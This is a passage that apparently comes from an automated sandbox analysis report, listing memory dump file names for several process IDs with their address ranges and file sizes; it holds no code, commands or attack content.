                    • memory/1692-94-0x0000000000000000-mapping.dmp

                    • memory/1692-98-0x0000000000240000-0x0000000000241000-memory.dmp

                      Filesize

                      4KB

                    • memory/1724-57-0x000007FEF23B0000-0x000007FEF2F0D000-memory.dmp

                      Filesize

                      11.4MB

                    • memory/1724-55-0x000007FEF2F10000-0x000007FEF3FA6000-memory.dmp

                      Filesize

                      16.6MB

                    • memory/1724-56-0x00000000021B0000-0x00000000021B2000-memory.dmp

                      Filesize

                      8KB

                    • memory/1724-88-0x000000001B220000-0x000000001B239000-memory.dmp

                      Filesize

                      100KB

                    • memory/1724-87-0x00000000021DD000-0x00000000021DF000-memory.dmp

                      Filesize

                      8KB

                    • memory/1740-82-0x0000000000000000-mapping.dmp

                    • memory/1748-115-0x0000000000000000-mapping.dmp

                    • memory/1748-122-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/1756-144-0x0000000000000000-mapping.dmp

                    • memory/1756-147-0x0000000000230000-0x0000000000231000-memory.dmp

                      Filesize

                      4KB

                    • memory/1892-123-0x00000000002F0000-0x00000000002F1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1932-80-0x0000000000000000-mapping.dmp

                    • memory/2024-74-0x0000000000000000-mapping.dmp